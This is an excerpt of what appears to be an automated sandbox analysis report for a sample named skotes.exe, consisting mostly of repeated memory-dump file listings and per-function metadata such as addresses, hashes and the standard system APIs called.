Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 63b5feb69747d4dfb24cb7d4cf264c40ed869b75fe9477f32093ec39e34078ba
Instruction ID: 3089a5aec9e6a53e9c6edacf01078283c59a47b3d893d3a4e1a7824c5b79c9ed
Opcode Fuzzy Hash: 63b5feb69747d4dfb24cb7d4cf264c40ed869b75fe9477f32093ec39e34078ba
Instruction Fuzzy Hash: 66A1DFB1E01205AFDB24EF64CD4476ABBA8FF15334F048169E816D7241EB79EA04EBD1

Function 00F6CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00F6CC66

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: c53fafddc465433499df8f720250a1c6099257d3a9e3fa3b0491c811a430a080
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 6DB11232D046859FDB11CF28C8817BEBBF5EF55350F14816AD8D5EB242D6399D02EBA0

Function 00F4BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 00F4BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 00F4BBE4
_xtime_get.LIBCPMT ref: 00F4BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 00F4BC13

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: dc4fa01a7bd77237d454399baa41bf09f719295e39e4dd52fd49e4ba11d7ee21
Instruction ID: a21de586506f67550394c0ba6fefc9a77e5b47f3cb337d253ae384483fc69e50
Opcode Fuzzy Hash: dc4fa01a7bd77237d454399baa41bf09f719295e39e4dd52fd49e4ba11d7ee21
Instruction Fuzzy Hash: F5214F71E01119AFDF40EFA4DC819BEBBB9EF08720F114415FA05A7261DB389D05ABA0

Analysis Process: skotes.exePID: 7780, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1885
Total number of Limit Nodes:	15

Executed Functions

Function 00F6652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00F6652A,?,?,?,?,?,00F67661), ref: 00F66567

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 26d884b70fb9a0f797843b0364c9775382a38fdcb91109a9352ba31d4a78496f
Instruction ID: 0c9197af0b41f6951e4ce5333439152fc7e5eaa8175f721d95b7cefc7ad0794b
Opcode Fuzzy Hash: 26d884b70fb9a0f797843b0364c9775382a38fdcb91109a9352ba31d4a78496f
Instruction Fuzzy Hash: 41E08C3001010CAFCE257B18DD0EA483B6AFB41751F540814F809C6232CB2AED91EA90

Function 00F39BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314671752.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314693065.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314724657.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314750999.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314772140.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314793852.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314815800.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314838440.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314857259.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314880107.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314899015.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314924795.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314944760.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314966374.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314987027.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315008217.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315036739.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315059328.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315077897.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315097820.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315116351.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315135570.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315156562.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315181702.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315204096.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315258774.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315281119.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315306466.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315329166.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315350059.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315373381.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2315393972.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 54904b904e27d11e1c0d89d376dd5abbc4f5045e8b170a26ce2d84d71d519639
Instruction ID: 27f87a9bbd9aa20c962a288348b192fa3d12f090906bebff25421a6aced720eb
Opcode Fuzzy Hash: 54904b904e27d11e1c0d89d376dd5abbc4f5045e8b170a26ce2d84d71d519639
Instruction Fuzzy Hash: 3C312C31B092058BEB089B7CDC89B6DBB62EBC5334F244219E454EB3D5C7B58981AB51

Function 00F39F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000004.00000002.2313199607.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000004.00000002.2313169314.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313199607.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313427073.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313491921.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2313522792.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314227761.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314307739.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314342994.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314462347.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314490771.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314511766.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314533241.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314561396.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314585193.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2314616140.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
